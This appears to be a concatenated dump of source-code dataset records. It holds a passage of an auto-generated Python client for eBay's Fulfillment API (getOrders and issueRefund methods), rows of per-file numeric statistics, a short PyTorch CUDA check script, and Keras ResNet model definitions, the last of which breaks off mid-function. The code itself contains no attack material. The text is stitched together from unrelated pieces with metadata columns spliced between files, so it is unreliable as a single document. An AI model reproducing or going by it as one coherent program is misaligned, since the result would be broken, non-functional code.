:param str limit: The number of orders to return per page of the result set. Use this parameter in conjunction with the offset parameter to control the pagination of the output. For example, if offset is set to 10 and limit is set to 10, the call retrieves orders 11 thru 20 from the result set. Note: This feature employs a zero-based list, where the first item in the list has an offset of 0. If the orderIds parameter is included in the request, this parameter will be ignored. Maximum: 1000 Default: 50
:param str offset: Specifies the number of orders to skip in the result set before returning the first order in the paginated response. Combine offset with the limit query parameter to control the items returned in the response. For example, if you supply an offset of 0 and a limit of 10, the first page of the response contains the first 10 items from the complete list of items retrieved by the call. If offset is 10 and limit is 20, the first page of the response contains items 11-30 from the complete result set. Default: 0
:param str order_ids: A comma-separated list of the unique identifiers of the orders to retrieve (maximum 50). If one or more order ID values are specified through the orderIds query parameter, all other query parameters will be ignored. Note: A new order ID format was introduced to all eBay APIs (legacy and REST) in June 2019. In REST APIs that return Order IDs, including the Fulfillment API, all order IDs are returned in the new format, but the getOrders method will accept both the legacy and new format order ID. The new format is a non-parsable string, globally unique across all eBay marketplaces, and consistent for both single line item and multiple line item orders. These order identifiers will be automatically generated after buyer payment, and unlike in the past, instead of just being known and exposed to the seller, these unique order identifiers will also be known and used/referenced by the buyer and eBay customer support.
:return: OrderSearchPagedCollection
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_orders_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_orders_with_http_info(**kwargs) # noqa: E501
return data
def get_orders_with_http_info(self, **kwargs): # noqa: E501
"""get_orders # noqa: E501
Use this call to search for and retrieve one or more orders based on their creation date, last modification date, or fulfillment status using the filter parameter. You can alternatively specify a list of orders using the orderIds parameter. Include the optional fieldGroups query parameter set to TAX_BREAKDOWN to return a breakdown of the taxes and fees. The returned Order objects contain information you can use to create and process fulfillments, including: Information about the buyer and seller Information about the order's line items The plans for packaging, addressing and shipping the order The status of payment, packaging, addressing, and shipping the order A summary of monetary amounts specific to the order such as pricing, payments, and shipping costs A summary of applied taxes and fees, and optionally a breakdown of each Important: In this call, the cancelStatus.cancelRequests array is returned but is always empty. Use the getOrder call instead, which returns this array fully populated with information about any cancellation requests. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_orders_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str field_groups: The response type associated with the order. The only presently supported value is TAX_BREAKDOWN. This type returns a breakdown of tax and fee values associated with the order.
:param str filter: One or more comma-separated criteria for narrowing down the collection of orders returned by this call. These criteria correspond to specific fields in the response payload. Multiple filter criteria combine to further restrict the results. Note: Currently, filter returns data from only the last 90 days. If the orderIds parameter is included in the request, the filter parameter will be ignored. The available criteria are as follows: creationdate The time period during which qualifying orders were created (the orders.creationDate field). In the URI, this is expressed as a starting timestamp, with or without an ending timestamp (in brackets). The timestamps are in ISO 8601 format, which uses the 24-hour Universal Coordinated Time (UTC) clock.For example: creationdate:[2016-02-21T08:25:43.511Z..] identifies orders created on or after the given timestamp. creationdate:[2016-02-21T08:25:43.511Z..2016-04-21T08:25:43.511Z] identifies orders created between the given timestamps, inclusive. lastmodifieddate The time period during which qualifying orders were last modified (the orders.modifiedDate field). In the URI, this is expressed as a starting timestamp, with or without an ending timestamp (in brackets). The timestamps are in ISO 8601 format, which uses the 24-hour Universal Coordinated Time (UTC) clock.For example: lastmodifieddate:[2016-05-15T08:25:43.511Z..] identifies orders modified on or after the given timestamp. lastmodifieddate:[2016-05-15T08:25:43.511Z..2016-05-31T08:25:43.511Z] identifies orders modified between the given timestamps, inclusive. Note: If creationdate and lastmodifieddate are both included, only creationdate is used. orderfulfillmentstatus The degree to which qualifying orders have been shipped (the orders.orderFulfillmentStatus field). In the URI, this is expressed as one of the following value combinations: orderfulfillmentstatus:{NOT_STARTED|IN_PROGRESS} specifies orders for which no shipping fulfillments have been started, plus orders for which at least one shipping fulfillment has been started but not completed. orderfulfillmentstatus:{FULFILLED|IN_PROGRESS} specifies orders for which all shipping fulfillments have been completed, plus orders for which at least one shipping fulfillment has been started but not completed. Note: The values NOT_STARTED, IN_PROGRESS, and FULFILLED can be used in various combinations, but only the combinations shown here are currently supported. Here is an example of a getOrders call using all of these filters: GET https://api.ebay.com/sell/v1/order? filter=creationdate:%5B2016-03-21T08:25:43.511Z..2016-04-21T08:25:43.511Z%5D, lastmodifieddate:%5B2016-05-15T08:25:43.511Z..%5D, orderfulfillmentstatus:%7BNOT_STARTED%7CIN_PROGRESS%7D Note: This call requires that certain special characters in the URI query string be percent-encoded: [ = %5B ] = %5D { = %7B | = %7C } = %7D This query filter example uses these codes. For implementation help, refer to eBay API documentation at https://developer.ebay.com/api-docs/sell/fulfillment/types/api:FilterField
:param str limit: The number of orders to return per page of the result set. Use this parameter in conjunction with the offset parameter to control the pagination of the output. For example, if offset is set to 10 and limit is set to 10, the call retrieves orders 11 thru 20 from the result set. Note: This feature employs a zero-based list, where the first item in the list has an offset of 0. If the orderIds parameter is included in the request, this parameter will be ignored. Maximum: 1000 Default: 50
:param str offset: Specifies the number of orders to skip in the result set before returning the first order in the paginated response. Combine offset with the limit query parameter to control the items returned in the response. For example, if you supply an offset of 0 and a limit of 10, the first page of the response contains the first 10 items from the complete list of items retrieved by the call. If offset is 10 and limit is 20, the first page of the response contains items 11-30 from the complete result set. Default: 0
:param str order_ids: A comma-separated list of the unique identifiers of the orders to retrieve (maximum 50). If one or more order ID values are specified through the orderIds query parameter, all other query parameters will be ignored. Note: A new order ID format was introduced to all eBay APIs (legacy and REST) in June 2019. In REST APIs that return Order IDs, including the Fulfillment API, all order IDs are returned in the new format, but the getOrders method will accept both the legacy and new format order ID. The new format is a non-parsable string, globally unique across all eBay marketplaces, and consistent for both single line item and multiple line item orders. These order identifiers will be automatically generated after buyer payment, and unlike in the past, instead of just being known and exposed to the seller, these unique order identifiers will also be known and used/referenced by the buyer and eBay customer support.
:return: OrderSearchPagedCollection
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['field_groups', 'filter', 'limit', 'offset', 'order_ids'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_orders" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'field_groups' in params:
query_params.append(('fieldGroups', params['field_groups'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'order_ids' in params:
query_params.append(('orderIds', params['order_ids'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/order', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OrderSearchPagedCollection', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def issue_refund(self, order_id, **kwargs): # noqa: E501
"""Issue Refund # noqa: E501
This method allows a seller (opted in to eBay Managed Payments) to issue a full or partial refund to a buyer for an order. Full or partial refunds can be issued at the order level or line item level. The refunds issued through this method are processed asynchronously, so the refund will not show as 'Refunded' right away. A seller will have to make a subsequent getOrder call to check the status of the refund. The status of an order refund can be found in the paymentSummary.refunds.refundStatus field of the getOrder response. Note: eBay Managed Payments is currently only available to a limited number of US sellers, but this program is scheduled to become available to more sellers throughout 2019 and beyond. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.issue_refund(order_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str order_id: The unique identifier of the order. Order IDs are returned in the getOrders method (and GetOrders call of Trading API). The issueRefund method supports the legacy API Order IDs and REST API order IDs. Note: In the Trading API (and other legacy APIs), Order IDs are transitioning to a new format. The new format is a non-parsable string, globally unique across all eBay marketplaces, and consistent for both single line item and multiple line item orders. These order identifiers will be automatically generated after buyer payment, and unlike in the past, instead of just being known and exposed to the seller, these unique order identifiers will also be known and used/referenced by the buyer and eBay customer support. For developers and sellers who are already integrated with the Trading API's order management calls, this change shouldn't impact your integration unless you parse the existing order identifiers (e.g., OrderID or OrderLineItemID), or otherwise infer meaning from the format (e.g., differentiating between a single line item order versus a multiple line item order). Because we realize that some integrations may have logic that is dependent upon the identifier format, eBay is rolling out the Trading API change with version control to support a transition period of approximately 9 months before applications must switch to the new format completely. See the OrderID field description in the GetOrders call for more details and requirements on transitioning to the new Order ID format. (required)
:param IssueRefundRequest body:
:return: Refund
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.issue_refund_with_http_info(order_id, **kwargs) # noqa: E501
else:
(data) = self.issue_refund_with_http_info(order_id, **kwargs) # noqa: E501
return data
def issue_refund_with_http_info(self, order_id, **kwargs): # noqa: E501
"""Issue Refund # noqa: E501
This method allows a seller (opted in to eBay Managed Payments) to issue a full or partial refund to a buyer for an order. Full or partial refunds can be issued at the order level or line item level. The refunds issued through this method are processed asynchronously, so the refund will not show as 'Refunded' right away. A seller will have to make a subsequent getOrder call to check the status of the refund. The status of an order refund can be found in the paymentSummary.refunds.refundStatus field of the getOrder response. Note: eBay Managed Payments is currently only available to a limited number of US sellers, but this program is scheduled to become available to more sellers throughout 2019 and beyond. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.issue_refund_with_http_info(order_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str order_id: The unique identifier of the order. Order IDs are returned in the getOrders method (and GetOrders call of Trading API). The issueRefund method supports the legacy API Order IDs and REST API order IDs. Note: In the Trading API (and other legacy APIs), Order IDs are transitioning to a new format. The new format is a non-parsable string, globally unique across all eBay marketplaces, and consistent for both single line item and multiple line item orders. These order identifiers will be automatically generated after buyer payment, and unlike in the past, instead of just being known and exposed to the seller, these unique order identifiers will also be known and used/referenced by the buyer and eBay customer support. For developers and sellers who are already integrated with the Trading API's order management calls, this change shouldn't impact your integration unless you parse the existing order identifiers (e.g., OrderID or OrderLineItemID), or otherwise infer meaning from the format (e.g., differentiating between a single line item order versus a multiple line item order). Because we realize that some integrations may have logic that is dependent upon the identifier format, eBay is rolling out the Trading API change with version control to support a transition period of approximately 9 months before applications must switch to the new format completely. See the OrderID field description in the GetOrders call for more details and requirements on transitioning to the new Order ID format. (required)
:param IssueRefundRequest body:
:return: Refund
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['order_id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method issue_refund" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'order_id' is set
if ('order_id' not in params or
params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `issue_refund`") # noqa: E501
collection_formats = {}
path_params = {}
if 'order_id' in params:
path_params['order_id'] = params['order_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/order/{order_id}/issue_refund', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Refund', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 97.131195
| 3,247
| 0.73118
| 4,845
| 33,316
| 4.94902
| 0.103818
| 0.016348
| 0.018017
| 0.017349
| 0.957544
| 0.950413
| 0.950413
| 0.942656
| 0.942656
| 0.938694
| 0
| 0.02295
| 0.208729
| 33,316
| 342
| 3,248
| 97.415205
| 0.886617
| 0.748019
| 0
| 0.710227
| 0
| 0
| 0.17587
| 0.033237
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039773
| false
| 0
| 0.022727
| 0
| 0.119318
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
707e8c48ea530039be5ed42e93a751c948702613
| 185
|
py
|
Python
|
test.py
|
Ares-Long/Time
|
7827463613f45baea82de189a890afb7394e73e4
|
[
"Apache-2.0"
] | null | null | null |
test.py
|
Ares-Long/Time
|
7827463613f45baea82de189a890afb7394e73e4
|
[
"Apache-2.0"
] | null | null | null |
test.py
|
Ares-Long/Time
|
7827463613f45baea82de189a890afb7394e73e4
|
[
"Apache-2.0"
] | null | null | null |
import torch
## 测试是否模型使用GPU
print(torch.cuda.is_available())
print(torch.cuda.empty_cache())
print(torch.__version__)
print(torch.version.cuda)
print(torch.cuda.empty_cache())
| 20.555556
| 33
| 0.756757
| 25
| 185
| 5.32
| 0.4
| 0.37594
| 0.315789
| 0.285714
| 0.360902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097297
| 185
| 9
| 34
| 20.555556
| 0.796407
| 0.059459
| 0
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.166667
| 0
| 0.166667
| 0.833333
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
3b43480de85ca8282ce513064c562e8d5e11dbf5
| 22,495
|
py
|
Python
|
resnet.py
|
karazijal/automatic_xcnn_topologies
|
3c17b8537650a1d3d0a95269ebce12c136a12dda
|
[
"MIT"
] | null | null | null |
resnet.py
|
karazijal/automatic_xcnn_topologies
|
3c17b8537650a1d3d0a95269ebce12c136a12dda
|
[
"MIT"
] | null | null | null |
resnet.py
|
karazijal/automatic_xcnn_topologies
|
3c17b8537650a1d3d0a95269ebce12c136a12dda
|
[
"MIT"
] | 1
|
2021-11-09T09:06:48.000Z
|
2021-11-09T09:06:48.000Z
|
from keras.models import Model
from keras.layers import Convolution2D, MaxPooling2D, Dense, Flatten, Input, BatchNormalization, Activation, AveragePooling2D, merge, Lambda
from keras.layers import SeparableConvolution2D
from keras.regularizers import l2
import math
def cf(x: float, eps=0.0001):
return int(math.ceil(x - eps))
def get_resent_baseline(input_shape, nb_classes, init, reg, pr_axis, nb_stages):
i = Input(shape=input_shape)
c0i = Convolution2D(128, 3, 3, subsample=(2, 2), border_mode='same', bias=False, init=init, W_regularizer=l2(reg),
name='inp_conv')(i)
b0i = BatchNormalization(axis=pr_axis, name='inp_bn')(c0i)
r0i = Activation('relu', name='inp_ac')(b0i)
xspots = []
stage_start = r0i
for j in range(nb_stages):
if j > 0:
# x = Activation('linear',name='xm_{}'.format(j))(stage_start)
# x = MaxPooling2D(pool_size=(1, 1), name='xm_{}'.format(j))(stage_start)
# xspots.append('xm_{}'.format(j))
x = BatchNormalization(axis=pr_axis, name='bn_c_{}'.format(j))(stage_start)
x = Activation('relu', name='a_c_{}'.format(j))(x)
cs = Convolution2D(32, 1, 1, bias=False, init=init, W_regularizer=l2(reg), name='c_a_{}'.format(j))(x)
else:
cs = Convolution2D(32, 1, 1, bias=False, init=init, W_regularizer=l2(reg), name='c_a_{}'.format(j))(
stage_start)
bns = BatchNormalization(axis=pr_axis, name='bn_a_{}'.format(j))(cs)
acs = Activation('relu', name='a_a_{}'.format(j))(bns)
cs2 = Convolution2D(32, 3, 3, bias=False, border_mode='same', init=init, W_regularizer=l2(reg),
name='c_b_{}'.format(j))(acs)
bns2 = BatchNormalization(axis=pr_axis, name='bn_b{}'.format(j))(cs2)
acs2 = Activation('relu', name='a_b_{}'.format(j))(bns2)
cve = Convolution2D(128, 1, 1, init=init, W_regularizer=l2(reg), name='c_c_{}'.format(j))(acs2)
stage_start = merge([stage_start, cve], mode='sum', name='+_{}'.format(j))
# 16 + 11*24
bnF = BatchNormalization(axis=pr_axis, name='bn_f')(stage_start)
rF = Activation('relu', name='a_f')(bnF)
p = AveragePooling2D(pool_size=(16, 16), name='avp_f')(rF)
f = Flatten()(p)
out = Dense(nb_classes, activation='softmax', name='output_softmax')(f)
model = Model(input=i, output=out)
return model
def get_multilayer_resnet(input_shape, nb_classes, init, reg, pr_axis, nb_stages):
print(init, reg, nb_stages)
def get_slice(axis, axis_id, input_shape):
return Lambda(
lambda x: x[
[slice(None) if i != axis else slice(axis_id, axis_id + 1) for i in range(len(input_shape) + 1)]],
output_shape=[p if i + 1 != axis else 1 for i, p in enumerate(input_shape)])
inputYUV = Input(shape=input_shape)
input_bn = BatchNormalization(axis=pr_axis)(inputYUV)
inputY = get_slice(pr_axis, 0, input_shape)(input_bn)
inputU = get_slice(pr_axis, 1, input_shape)(input_bn)
inputV = get_slice(pr_axis, 2, input_shape)(input_bn)
s = 1.6
mY = .5*s
mU = .25*s
mV = .25*s
c0iY = Convolution2D(cf(128*mY), 3, 3, subsample=(2, 2), border_mode='same', bias=False, init=init, W_regularizer=l2(reg),
name='inp_convY')(inputY)
b0iY = BatchNormalization(axis=pr_axis, name='inp_bnY')(c0iY)
r0iY = Activation('relu', name='inp_acY')(b0iY)
c0iU = Convolution2D(cf(128*mU), 3, 3, subsample=(2, 2), border_mode='same', bias=False, init=init, W_regularizer=l2(reg),
name='inp_convU')(inputU)
b0iU = BatchNormalization(axis=pr_axis, name='inp_bnU')(c0iU)
r0iU = Activation('relu', name='inp_acU')(b0iU)
c0iV = Convolution2D(cf(128*mV), 3, 3, subsample=(2, 2), border_mode='same', bias=False, init=init, W_regularizer=l2(reg),
name='inp_convV')(inputV)
b0iV = BatchNormalization(axis=pr_axis, name='inp_bnV')(c0iV)
r0iV = Activation('relu', name='inp_acV')(b0iV)
stage_startY = r0iY
stage_startU = r0iU
stage_startV = r0iV
for i in range(nb_stages):
if i > 0:
x = BatchNormalization(axis=pr_axis, name='bnY_c_{}'.format(i))(stage_startY)
x = Activation('relu', name='aY_c_{}'.format(i))(x)
csY = Convolution2D(cf(32*mY), 1, 1, bias=False, init=init, W_regularizer=l2(reg), name='cY_a_{}'.format(i))(x)
x = BatchNormalization(axis=pr_axis, name='bnU_c_{}'.format(i))(stage_startU)
x = Activation('relu', name='aU_c_{}'.format(i))(x)
csU = Convolution2D(cf(32 * mU), 1, 1, bias=False, init=init, W_regularizer=l2(reg),
name='cU_a_{}'.format(i))(x)
x = BatchNormalization(axis=pr_axis, name='bnV_c_{}'.format(i))(stage_startV)
x = Activation('relu', name='aV_c_{}'.format(i))(x)
csV = Convolution2D(cf(32 * mV), 1, 1, bias=False, init=init, W_regularizer=l2(reg),
name='cV_a_{}'.format(i))(x)
else:
csY = Convolution2D(cf(32 * mY), 1, 1, bias=False, init=init, W_regularizer=l2(reg),
name='cY_a_{}'.format(i))(stage_startY)
csU = Convolution2D(cf(32 * mU), 1, 1, bias=False, init=init, W_regularizer=l2(reg),
name='cU_a_{}'.format(i))(stage_startU)
csV = Convolution2D(cf(32 * mV), 1, 1, bias=False, init=init, W_regularizer=l2(reg),
name='cV_a_{}'.format(i))(stage_startV)
bn = BatchNormalization(axis=pr_axis, name='bnY_a_{}'.format(i))(csY)
ac = Activation('relu', name='aY_a_{}'.format(i))(bn)
c = Convolution2D(cf(32 * mY), 3, 3, bias=False, border_mode='same', init=init, W_regularizer=l2(reg),
name='cY_b_{}'.format(i))(ac)
bn2 = BatchNormalization(axis=pr_axis, name='bnY_b{}'.format(i))(c)
ac2 = Activation('relu', name='aY_b_{}'.format(i))(bn2)
c2Y = Convolution2D(cf(128 * mY), 1, 1, init=init, W_regularizer=l2(reg), name='cY_c_{}'.format(i))(ac2)
stage_startY = merge([stage_startY, c2Y], mode='sum', name='+Y_{}'.format(i))
bn = BatchNormalization(axis=pr_axis, name='bnU_a_{}'.format(i))(csU)
ac = Activation('relu', name='aU_a_{}'.format(i))(bn)
c = Convolution2D(cf(32 * mU), 3, 3, bias=False, border_mode='same', init=init, W_regularizer=l2(reg),
name='cU_b_{}'.format(i))(ac)
bn2 = BatchNormalization(axis=pr_axis, name='bnU_b{}'.format(i))(c)
ac2 = Activation('relu', name='aU_b_{}'.format(i))(bn2)
c2U = Convolution2D(cf(128 * mU), 1, 1, init=init, W_regularizer=l2(reg), name='cU_c_{}'.format(i))(ac2)
stage_startU = merge([stage_startU, c2U], mode='sum', name='+U_{}'.format(i))
bn = BatchNormalization(axis=pr_axis, name='bnV_a_{}'.format(i))(csV)
ac = Activation('relu', name='aV_a_{}'.format(i))(bn)
c = Convolution2D(cf(32 * mV), 3, 3, bias=False, border_mode='same', init=init, W_regularizer=l2(reg),
name='cV_b_{}'.format(i))(ac)
bn2 = BatchNormalization(axis=pr_axis, name='bnV_b{}'.format(i))(c)
ac2 = Activation('relu', name='aV_b_{}'.format(i))(bn2)
c2V = Convolution2D(cf(128 * mV), 1, 1, init=init, W_regularizer=l2(reg), name='cV_c_{}'.format(i))(ac2)
stage_startV = merge([stage_startV, c2V], mode='sum', name='+V_{}'.format(i))
fmerge = merge([stage_startY, stage_startU, stage_startV], mode='concat', concat_axis=pr_axis)
bnF = BatchNormalization(axis=pr_axis, name='bn_f')(fmerge)
rF = Activation('relu', name='a_f')(bnF)
p = AveragePooling2D(pool_size=(16, 16), name='avp_f')(rF)
f = Flatten()(p)
out = Dense(nb_classes, activation='softmax', name='output_softmax')(f)
model = Model(input=inputYUV , output=out)
return model
def get_xresnet(input_shape, nb_classes, init, reg, pr_axis, nb_stages):
print(init, reg, nb_stages)
def get_slice(axis, axis_id, input_shape):
return Lambda(
lambda x: x[
[slice(None) if i != axis else slice(axis_id, axis_id + 1) for i in range(len(input_shape) + 1)]],
output_shape=[p if i + 1 != axis else 1 for i, p in enumerate(input_shape)])
inputYUV = Input(shape=input_shape)
input_bn = BatchNormalization(axis=pr_axis)(inputYUV)
inputY = get_slice(pr_axis, 0, input_shape)(input_bn)
inputU = get_slice(pr_axis, 1, input_shape)(input_bn)
inputV = get_slice(pr_axis, 2, input_shape)(input_bn)
s = 1.6
mY = .5 * s
mU = .25 * s
mV = .25 * s
c0iY = Convolution2D(cf(128 * mY), 3, 3, subsample=(2, 2), border_mode='same', bias=False, init=init,
W_regularizer=l2(reg),
name='inp_convY')(inputY)
b0iY = BatchNormalization(axis=pr_axis, name='inp_bnY')(c0iY)
r0iY = Activation('relu', name='inp_acY')(b0iY)
c0iU = Convolution2D(cf(128 * mU), 3, 3, subsample=(2, 2), border_mode='same', bias=False, init=init,
W_regularizer=l2(reg),
name='inp_convU')(inputU)
b0iU = BatchNormalization(axis=pr_axis, name='inp_bnU')(c0iU)
r0iU = Activation('relu', name='inp_acU')(b0iU)
c0iV = Convolution2D(cf(128 * mV), 3, 3, subsample=(2, 2), border_mode='same', bias=False, init=init,
W_regularizer=l2(reg),
name='inp_convV')(inputV)
b0iV = BatchNormalization(axis=pr_axis, name='inp_bnV')(c0iV)
r0iV = Activation('relu', name='inp_acV')(b0iV)
stage_startY = r0iY
stage_startU = r0iU
stage_startV = r0iV
i = 'acc'
Y_to_U = Convolution2D(16, 1, 1, init=init, activation='relu', name='YtoU_{}'.format(i))(stage_startY)
Y_to_V = Convolution2D(16, 1, 1, init=init, activation='relu', name='YtoV_{}'.format(i))(stage_startY)
U_to_Y = Convolution2D(8, 1, 1, init=init, activation='relu', name='UtoY_{}'.format(i))(stage_startU)
U_to_V = Convolution2D(8, 1, 1, init=init, activation='relu', name='UtoV_{}'.format(i))(stage_startU)
V_to_Y = Convolution2D(8, 1, 1, init=init, activation='relu', name='VtoY_{}'.format(i))(stage_startV)
V_to_U = Convolution2D(8, 1, 1, init=init, activation='relu', name='VtoU_{}'.format(i))(stage_startV)
stage_startY = merge([stage_startY, U_to_Y, V_to_Y], mode='concat', concat_axis=pr_axis, name='XY_{}'.format(i))
stage_startU = merge([stage_startU, Y_to_U, V_to_U], mode='concat', concat_axis=pr_axis, name='XU_{}'.format(i))
stage_startV = merge([stage_startV, Y_to_V, U_to_V], mode='concat', concat_axis=pr_axis, name='XV_{}'.format(i))
for i in range(nb_stages):
if i > 0:
x = BatchNormalization(axis=pr_axis, name='bnY_c_{}'.format(i))(stage_startY)
x = Activation('relu', name='aY_c_{}'.format(i))(x)
csY = Convolution2D(cf(32 * mY), 1, 1, bias=False, init=init, W_regularizer=l2(reg),
name='cY_a_{}'.format(i))(x)
x = BatchNormalization(axis=pr_axis, name='bnU_c_{}'.format(i))(stage_startU)
x = Activation('relu', name='aU_c_{}'.format(i))(x)
csU = Convolution2D(cf(32 * mU), 1, 1, bias=False, init=init, W_regularizer=l2(reg),
name='cU_a_{}'.format(i))(x)
x = BatchNormalization(axis=pr_axis, name='bnV_c_{}'.format(i))(stage_startV)
x = Activation('relu', name='aV_c_{}'.format(i))(x)
csV = Convolution2D(cf(32 * mV), 1, 1, bias=False, init=init, W_regularizer=l2(reg),
name='cV_a_{}'.format(i))(x)
else:
csY = Convolution2D(cf(32 * mY), 1, 1, bias=False, init=init, W_regularizer=l2(reg),
name='cY_a_{}'.format(i))(stage_startY)
csU = Convolution2D(cf(32 * mU), 1, 1, bias=False, init=init, W_regularizer=l2(reg),
name='cU_a_{}'.format(i))(stage_startU)
csV = Convolution2D(cf(32 * mV), 1, 1, bias=False, init=init, W_regularizer=l2(reg),
name='cV_a_{}'.format(i))(stage_startV)
bn = BatchNormalization(axis=pr_axis, name='bnY_a_{}'.format(i))(csY)
ac = Activation('relu', name='aY_a_{}'.format(i))(bn)
c = Convolution2D(cf(32 * mY), 3, 3, bias=False, border_mode='same', init=init, W_regularizer=l2(reg),
name='cY_b_{}'.format(i))(ac)
bn2 = BatchNormalization(axis=pr_axis, name='bnY_b{}'.format(i))(c)
ac2 = Activation('relu', name='aY_b_{}'.format(i))(bn2)
c2Y = Convolution2D(cf(128 * mY), 1, 1, init=init, W_regularizer=l2(reg), name='cY_c_{}'.format(i))(ac2)
# stage_startY = merge([stage_startY, c2Y], mode='sum', name='+Y_{}'.format(i))
bn = BatchNormalization(axis=pr_axis, name='bnU_a_{}'.format(i))(csU)
ac = Activation('relu', name='aU_a_{}'.format(i))(bn)
c = Convolution2D(cf(32 * mU), 3, 3, bias=False, border_mode='same', init=init, W_regularizer=l2(reg),
name='cU_b_{}'.format(i))(ac)
bn2 = BatchNormalization(axis=pr_axis, name='bnU_b{}'.format(i))(c)
ac2 = Activation('relu', name='aU_b_{}'.format(i))(bn2)
c2U = Convolution2D(cf(128 * mU), 1, 1, init=init, W_regularizer=l2(reg), name='cU_c_{}'.format(i))(ac2)
# stage_startU = merge([stage_startU, c2U], mode='sum', name='+U_{}'.format(i))
bn = BatchNormalization(axis=pr_axis, name='bnV_a_{}'.format(i))(csV)
ac = Activation('relu', name='aV_a_{}'.format(i))(bn)
c = Convolution2D(cf(32 * mV), 3, 3, bias=False, border_mode='same', init=init, W_regularizer=l2(reg),
name='cV_b_{}'.format(i))(ac)
bn2 = BatchNormalization(axis=pr_axis, name='bnV_b{}'.format(i))(c)
ac2 = Activation('relu', name='aV_b_{}'.format(i))(bn2)
c2V = Convolution2D(cf(128 * mV), 1, 1, init=init, W_regularizer=l2(reg), name='cV_c_{}'.format(i))(ac2)
# stage_startV = merge([stage_startV, c2V], mode='sum', name='+V_{}'.format(i))
#---____Cross-connections___---#
Y_to_U = Convolution2D(16, 1, 1, init=init, activation='relu', name='YtoU_{}'.format(i))(c2Y)
Y_to_V = Convolution2D(16, 1, 1, init=init, activation='relu', name='YtoV_{}'.format(i))(c2Y)
U_to_Y = Convolution2D(8, 1, 1, init=init, activation='relu', name='UtoY_{}'.format(i))(c2U)
U_to_V = Convolution2D(8, 1, 1, init=init, activation='relu', name='UtoV_{}'.format(i))(c2U)
V_to_Y = Convolution2D(8, 1, 1, init=init, activation='relu', name='VtoY_{}'.format(i))(c2V)
V_to_U = Convolution2D(8, 1, 1, init=init, activation='relu', name='VtoU_{}'.format(i))(c2V)
xmY = merge([c2Y, U_to_Y, V_to_Y], mode='concat', concat_axis=pr_axis, name='XY_{}'.format(i))
xmU = merge([c2U, Y_to_U, V_to_U], mode='concat', concat_axis=pr_axis, name='XU_{}'.format(i))
xmV = merge([c2V, Y_to_V, U_to_V], mode='concat', concat_axis=pr_axis, name='XV_{}'.format(i))
stage_startY = merge([stage_startY, xmY], mode='sum', name='+Y_{}'.format(i))
stage_startU = merge([stage_startU, xmU], mode='sum', name='+U_{}'.format(i))
stage_startV = merge([stage_startV, xmV], mode='sum', name='+V_{}'.format(i))
fmerge = merge([stage_startY, stage_startU, stage_startV], mode='concat', concat_axis=pr_axis)
